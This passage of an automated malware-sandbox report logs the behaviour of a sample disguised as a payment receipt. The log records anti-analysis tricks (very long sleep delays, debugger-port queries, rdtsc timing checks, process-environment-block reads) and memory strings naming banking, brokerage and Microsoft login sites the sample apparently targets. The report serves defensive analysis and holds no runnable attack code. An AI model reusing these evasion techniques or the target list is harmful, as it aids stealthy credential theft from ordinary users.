                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe	Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara matchFile source: Process Memory Space: PAYMENT RECEIPT_USD21,000.exe PID: 1680, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: fttQgpyzkkc.exe PID: 7436, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeMemory allocated: 2B40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeMemory allocated: 2D30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeMemory allocated: 4D30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeMemory allocated: 8CA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeMemory allocated: 9CA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeMemory allocated: 9EA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeMemory allocated: AEA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeMemory allocated: 2CF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeMemory allocated: 2EE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeMemory allocated: 4EE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeMemory allocated: 8970000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeMemory allocated: 9970000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeMemory allocated: 9B50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeMemory allocated: AB50000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0115D1C0 rdtsc 9_2_0115D1C0
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6397Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7314Jump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeWindow / User API: threadDelayed 401
                Source: C:\Windows\SysWOW64\wlanext.exeWindow / User API: threadDelayed 9572
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.8 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.3 %
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe TID: 1124Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7192Thread sleep count: 6397 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7396Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7264Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7360Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe TID: 7516Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exe TID: 7856Thread sleep count: 401 > 30
                Source: C:\Windows\SysWOW64\wlanext.exe TID: 7856Thread sleep time: -802000s >= -30000s
                Source: C:\Windows\SysWOW64\wlanext.exe TID: 7856Thread sleep count: 9572 > 30
                Source: C:\Windows\SysWOW64\wlanext.exe TID: 7856Thread sleep time: -19144000s >= -30000s
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe TID: 7884Thread sleep time: -80000s >= -30000s
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe TID: 7884Thread sleep time: -60000s >= -30000s
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe TID: 7884Thread sleep time: -41000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeThread delayed: delay time: 922337203685477
                Source: 021oRg3.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: wlanext.exe, 00000011.00000002.4517846473.000000000342E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
                Source: 021oRg3.17.drBinary or memory string: discord.comVMware20,11696428655f
                Source: 021oRg3.17.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 021oRg3.17.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 021oRg3.17.drBinary or memory string: global block list test formVMware20,11696428655
                Source: 021oRg3.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: 021oRg3.17.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: wlanext.exe, 00000011.00000002.4521627919.00000000082C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: exp_yearINTEGERmVMware
                Source: 021oRg3.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 021oRg3.17.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: 021oRg3.17.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 021oRg3.17.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 021oRg3.17.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 021oRg3.17.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 021oRg3.17.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: wlanext.exe, 00000011.00000002.4521627919.00000000082C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mVMware
                Source: 021oRg3.17.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: VfJW2xm7a.exe, 00000012.00000002.4518413821.0000000000879000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000013.00000002.2580831144.0000028C65A0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 021oRg3.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 021oRg3.17.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: 021oRg3.17.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 021oRg3.17.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: 021oRg3.17.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: 021oRg3.17.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: 021oRg3.17.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 021oRg3.17.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 021oRg3.17.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 021oRg3.17.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 021oRg3.17.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: 021oRg3.17.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: 021oRg3.17.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: 021oRg3.17.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 021oRg3.17.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 021oRg3.17.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0115D1C0 rdtsc 9_2_0115D1C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00417A83 LdrLoadDll,9_2_00417A83
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118A118 mov ecx, dword ptr fs:[00000030h]9_2_0118A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118A118 mov eax, dword ptr fs:[00000030h]9_2_0118A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118A118 mov eax, dword ptr fs:[00000030h]9_2_0118A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118A118 mov eax, dword ptr fs:[00000030h]9_2_0118A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A0115 mov eax, dword ptr fs:[00000030h]9_2_011A0115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01110124 mov eax, dword ptr fs:[00000030h]9_2_01110124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DB136 mov eax, dword ptr fs:[00000030h]9_2_010DB136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DB136 mov eax, dword ptr fs:[00000030h]9_2_010DB136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DB136 mov eax, dword ptr fs:[00000030h]9_2_010DB136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DB136 mov eax, dword ptr fs:[00000030h]9_2_010DB136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E1131 mov eax, dword ptr fs:[00000030h]9_2_010E1131
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E1131 mov eax, dword ptr fs:[00000030h]9_2_010E1131
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D9148 mov eax, dword ptr fs:[00000030h]9_2_010D9148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D9148 mov eax, dword ptr fs:[00000030h]9_2_010D9148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D9148 mov eax, dword ptr fs:[00000030h]9_2_010D9148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D9148 mov eax, dword ptr fs:[00000030h]9_2_010D9148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B5152 mov eax, dword ptr fs:[00000030h]9_2_011B5152
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01178158 mov eax, dword ptr fs:[00000030h]9_2_01178158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01174144 mov eax, dword ptr fs:[00000030h]9_2_01174144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01174144 mov eax, dword ptr fs:[00000030h]9_2_01174144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01174144 mov ecx, dword ptr fs:[00000030h]9_2_01174144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01174144 mov eax, dword ptr fs:[00000030h]9_2_01174144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01174144 mov eax, dword ptr fs:[00000030h]9_2_01174144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01173140 mov eax, dword ptr fs:[00000030h]9_2_01173140
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01173140 mov eax, dword ptr fs:[00000030h]9_2_01173140
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01173140 mov eax, dword ptr fs:[00000030h]9_2_01173140
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E6154 mov eax, dword ptr fs:[00000030h]9_2_010E6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E6154 mov eax, dword ptr fs:[00000030h]9_2_010E6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DC156 mov eax, dword ptr fs:[00000030h]9_2_010DC156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E7152 mov eax, dword ptr fs:[00000030h]9_2_010E7152
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01179179 mov eax, dword ptr fs:[00000030h]9_2_01179179
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF172 mov eax, dword ptr fs:[00000030h]9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01137190 mov eax, dword ptr fs:[00000030h]9_2_01137190
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116019F mov eax, dword ptr fs:[00000030h]9_2_0116019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116019F mov eax, dword ptr fs:[00000030h]9_2_0116019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116019F mov eax, dword ptr fs:[00000030h]9_2_0116019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116019F mov eax, dword ptr fs:[00000030h]9_2_0116019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0119C188 mov eax, dword ptr fs:[00000030h]9_2_0119C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0119C188 mov eax, dword ptr fs:[00000030h]9_2_0119C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01120185 mov eax, dword ptr fs:[00000030h]9_2_01120185
